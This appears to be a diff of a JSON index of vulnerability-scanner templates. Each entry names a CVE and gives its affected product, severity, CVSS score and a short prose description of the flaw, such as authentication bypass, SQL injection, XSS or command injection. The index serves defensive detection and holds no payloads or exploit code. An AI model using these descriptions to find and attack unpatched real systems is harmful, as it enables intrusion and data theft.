{"ID":"CVE-2021-29442","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"high","Description":"Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29442.yaml"} {"ID":"CVE-2021-29442","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"high","Description":"Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29442.yaml"}
@ -1344,7 +1347,7 @@
{"ID":"CVE-2021-37304","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Information Disclosure","Severity":"high","Description":"An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37304.yaml"} {"ID":"CVE-2021-37304","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Information Disclosure","Severity":"high","Description":"An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37304.yaml"}
{"ID":"CVE-2021-37305","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Sensitive Information Disclosure","Severity":"high","Description":"Jeecg Boot \u003c= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37305.yaml"} {"ID":"CVE-2021-37305","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Sensitive Information Disclosure","Severity":"high","Description":"Jeecg Boot \u003c= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37305.yaml"}
{"ID":"CVE-2021-37416","Info":{"Name":"Zoho ManageEngine ADSelfService Plus \u003c=6103 - Cross-Site Scripting","Severity":"medium","Description":"Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37416.yaml"} {"ID":"CVE-2021-37416","Info":{"Name":"Zoho ManageEngine ADSelfService Plus \u003c=6103 - Cross-Site Scripting","Severity":"medium","Description":"Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37416.yaml"}
{"ID":"CVE-2021-37538","Info":{"Name":"PrestaShop SmartBlog \u003c4.0.6- SQL Injection","Severity":"critical","Description":"PrestaShop SmartBlog by SmartDataSoft \u003c 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37538.yaml"} {"ID":"CVE-2021-37538","Info":{"Name":"PrestaShop SmartBlog \u003c4.0.6 - SQL Injection","Severity":"critical","Description":"PrestaShop SmartBlog by SmartDataSoft \u003c 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37538.yaml"}
{"ID":"CVE-2021-37573","Info":{"Name":"Tiny Java Web Server - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) \u003c=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37573.yaml"} {"ID":"CVE-2021-37573","Info":{"Name":"Tiny Java Web Server - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) \u003c=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37573.yaml"}
{"ID":"CVE-2021-37580","Info":{"Name":"Apache ShenYu Admin JWT - Authentication Bypass","Severity":"critical","Description":"Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37580.yaml"} {"ID":"CVE-2021-37580","Info":{"Name":"Apache ShenYu Admin JWT - Authentication Bypass","Severity":"critical","Description":"Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37580.yaml"}
{"ID":"CVE-2021-37589","Info":{"Name":"Virtua Software Cobranca \u003c12R - Blind SQL Injection","Severity":"high","Description":"Virtua Cobranca before 12R allows blind SQL injection on the login page.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37589.yaml"} {"ID":"CVE-2021-37589","Info":{"Name":"Virtua Software Cobranca \u003c12R - Blind SQL Injection","Severity":"high","Description":"Virtua Cobranca before 12R allows blind SQL injection on the login page.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37589.yaml"}
@ -1453,6 +1456,7 @@
{"ID":"CVE-2021-44528","Info":{"Name":"Open Redirect in Host Authorization Middleware","Severity":"medium","Description":"Specially crafted \"X-Forwarded-Host\" headers in combination with certain \"allowed host\" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-44528.yaml"} {"ID":"CVE-2021-44528","Info":{"Name":"Open Redirect in Host Authorization Middleware","Severity":"medium","Description":"Specially crafted \"X-Forwarded-Host\" headers in combination with certain \"allowed host\" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-44528.yaml"}
{"ID":"CVE-2021-44529","Info":{"Name":"Ivanti EPM Cloud Services Appliance Code Injection","Severity":"critical","Description":"Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44529.yaml"} {"ID":"CVE-2021-44529","Info":{"Name":"Ivanti EPM Cloud Services Appliance Code Injection","Severity":"critical","Description":"Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44529.yaml"}
{"ID":"CVE-2021-44848","Info":{"Name":"Thinfinity VirtualUI User Enumeration","Severity":"medium","Description":"Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-44848.yaml"} {"ID":"CVE-2021-44848","Info":{"Name":"Thinfinity VirtualUI User Enumeration","Severity":"medium","Description":"Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-44848.yaml"}
{"ID":"CVE-2021-44910","Info":{"Name":"SpringBlade - Information Leakage","Severity":"high","Description":"SpringBlade is a comprehensive project upgraded and optimized from a commercial-grade project, featuring both a SpringCloud distributed microservice architecture and a SpringBoot monolithic microservice architecture. The SpringBlade framework has a default SIGN_KEY, which can be exploited by attackers to obtain sensitive information such as user account password logs.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-44910.yaml"}
{"ID":"CVE-2021-45043","Info":{"Name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","Severity":"high","Description":"Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-45043.yaml"} {"ID":"CVE-2021-45043","Info":{"Name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","Severity":"high","Description":"Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-45043.yaml"}
{"ID":"CVE-2021-45046","Info":{"Name":"Apache Log4j2 - Remote Code Injection","Severity":"critical","Description":"Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-45046.yaml"} {"ID":"CVE-2021-45046","Info":{"Name":"Apache Log4j2 - Remote Code Injection","Severity":"critical","Description":"Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-45046.yaml"}
{"ID":"CVE-2021-45092","Info":{"Name":"Thinfinity Iframe Injection","Severity":"critical","Description":"A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the \"vpath\" parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45092.yaml"} {"ID":"CVE-2021-45092","Info":{"Name":"Thinfinity Iframe Injection","Severity":"critical","Description":"A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the \"vpath\" parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45092.yaml"}
@ -1477,6 +1481,7 @@
{"ID":"CVE-2021-46422","Info":{"Name":"SDT-CW3B1 1.1.0 - OS Command Injection","Severity":"critical","Description":"Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46422.yaml"} {"ID":"CVE-2021-46422","Info":{"Name":"SDT-CW3B1 1.1.0 - OS Command Injection","Severity":"critical","Description":"Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46422.yaml"}
{"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46424.yaml"} {"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46424.yaml"}
{"ID":"CVE-2021-46704","Info":{"Name":"GenieACS =\u003e 1.2.8 - OS Command Injection","Severity":"critical","Description":"In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46704.yaml"} {"ID":"CVE-2021-46704","Info":{"Name":"GenieACS =\u003e 1.2.8 - OS Command Injection","Severity":"critical","Description":"In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46704.yaml"}
{"ID":"CVE-2022-0087","Info":{"Name":"Keystone 6 Login Page - Open Redirect and Cross-Site Scripting","Severity":"medium","Description":"On the login page, there is a \"from=\" parameter in URL which is vulnerable to open redirect and can be escalated to reflected XSS.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-0087.yaml"}
{"ID":"CVE-2022-0140","Info":{"Name":"WordPress Visual Form Builder \u003c3.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0140.yaml"} {"ID":"CVE-2022-0140","Info":{"Name":"WordPress Visual Form Builder \u003c3.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0140.yaml"}
{"ID":"CVE-2022-0147","Info":{"Name":"WordPress Cookie Information/Free GDPR Consent Solution \u003c2.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0147.yaml"} {"ID":"CVE-2022-0147","Info":{"Name":"WordPress Cookie Information/Free GDPR Consent Solution \u003c2.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0147.yaml"}
{"ID":"CVE-2022-0148","Info":{"Name":"WordPress All-in-one Floating Contact Form \u003c2.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0148.yaml"} {"ID":"CVE-2022-0148","Info":{"Name":"WordPress All-in-one Floating Contact Form \u003c2.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0148.yaml"}
@ -1990,6 +1995,7 @@
{"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"} {"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"}
{"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"} {"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"}
{"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"} {"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"}
{"ID":"CVE-2023-22232","Info":{"Name":"Adobe Connect \u003c 12.1.5 - Local File Disclosure","Severity":"medium","Description":"Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-22232.yaml"}
{"ID":"CVE-2023-2224","Info":{"Name":"Seo By 10Web \u003c 1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2224.yaml"} {"ID":"CVE-2023-2224","Info":{"Name":"Seo By 10Web \u003c 1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2224.yaml"}
{"ID":"CVE-2023-22432","Info":{"Name":"Web2py URL - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-22432.yaml"} {"ID":"CVE-2023-22432","Info":{"Name":"Web2py URL - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-22432.yaml"}
{"ID":"CVE-2023-22463","Info":{"Name":"KubePi JwtSigKey - Admin Authentication Bypass","Severity":"critical","Description":"KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22463.yaml"} {"ID":"CVE-2023-22463","Info":{"Name":"KubePi JwtSigKey - Admin Authentication Bypass","Severity":"critical","Description":"KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22463.yaml"}
@ -2026,6 +2032,7 @@
{"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"} {"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"}
{"ID":"CVE-2023-25573","Info":{"Name":"Metersphere - Arbitrary File Read","Severity":"high","Description":"Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-25573.yaml"} {"ID":"CVE-2023-25573","Info":{"Name":"Metersphere - Arbitrary File Read","Severity":"high","Description":"Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-25573.yaml"}
{"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"} {"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"}
{"ID":"CVE-2023-26035","Info":{"Name":"ZoneMinder Snapshots - Command Injection","Severity":"critical","Description":"ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras.Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26035.yaml"}
{"ID":"CVE-2023-26067","Info":{"Name":"Lexmark Printers - Command Injection","Severity":"high","Description":"Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-26067.yaml"} {"ID":"CVE-2023-26067","Info":{"Name":"Lexmark Printers - Command Injection","Severity":"high","Description":"Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-26067.yaml"}
{"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"} {"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"}
{"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"} {"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"}
@ -2078,6 +2085,7 @@
{"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"} {"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"}
{"ID":"CVE-2023-30256","Info":{"Name":"Webkul QloApps 1.5.2 - Cross-site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30256.yaml"} {"ID":"CVE-2023-30256","Info":{"Name":"Webkul QloApps 1.5.2 - Cross-site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30256.yaml"}
